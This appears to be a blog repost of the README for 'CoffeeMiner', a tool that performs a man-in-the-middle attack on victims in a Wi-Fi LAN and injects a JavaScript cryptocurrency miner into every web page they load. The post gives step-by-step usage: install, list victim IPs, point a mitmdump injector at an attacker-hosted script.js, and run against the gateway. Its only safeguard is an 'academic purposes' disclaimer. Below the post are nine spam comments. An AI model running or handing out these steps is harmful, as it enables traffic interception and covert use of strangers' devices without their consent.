Friday 19 January 2018

Coffee Miner – Wireless MITM Cryptocurrency Mining Pool

Collaborative (mitm) cryptocurrency mining pool in wifi networks
Warning: this project is for academic/research purposes only.
A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

Concept
  • Performs a MITM attack to all selected victims
  • Injects a js script in all the HTML pages requested by the victims
  • The js script injected contains a cryptocurrency miner
  • All the devices victims connected to the Lan network, will be mining for the CoffeeMiner
Use
  • install.sh
bash install.sh
  • edit victims.txt with one IP per line
  • edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
  • execute coffeeMiner.py
python3 coffeeMiner.py ipgateway


A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md

 

9 comments:

  1. I recently came across your blog and have been reading along. I thought I would leave my first comment. I don't know what to say except that I have enjoyed reading. Nice blog. I will keep visiting this blog very often.
    blockchain

    ReplyDelete
  2. Nice to read your article! I am looking forward to sharing your adventures and experiences. antminer s17 pro setup

    ReplyDelete
  3. Mold allergy is not the typical spring time allergy. It's an allergy that's on the basis of the air borne fungal spores or fragments. Because the spores and fragments are... World

    ReplyDelete
  4. Thanks so much for sharing this awesome info! I am looking forward to see more postsby you! amazon wireless earbuds

    ReplyDelete
  5. Really impressive post. I read it whole and going to share it with my social circules. I enjoyed your article and planning to rewrite it on my own blog. locked sim

    ReplyDelete
  6. It is my first visit to your blog, and I am very impressed with the articles that you serve. Give adequate knowledge for me. Thank you for sharing useful material. I will be back for the more great post. bitcoin to euro

    ReplyDelete
  7. Wow, cool post. I'd like to write like this too - taking time and real hard work to make a great article... but I put things off too much and never seem to get started. Thanks though. Trezor one vs Ledger S

    ReplyDelete
  8. I have read all the comments and suggestions posted by the visitors for this article are very fine,We will wait for your next article so only.Thanks! antminer e9

    ReplyDelete
  9. I’m going to read this. I’ll be sure to come back. thanks for sharing. and also This article gives the light in which we can observe the reality. this is very nice one and gives indepth information. thanks for this nice article... bitmain antminer l7

    ReplyDelete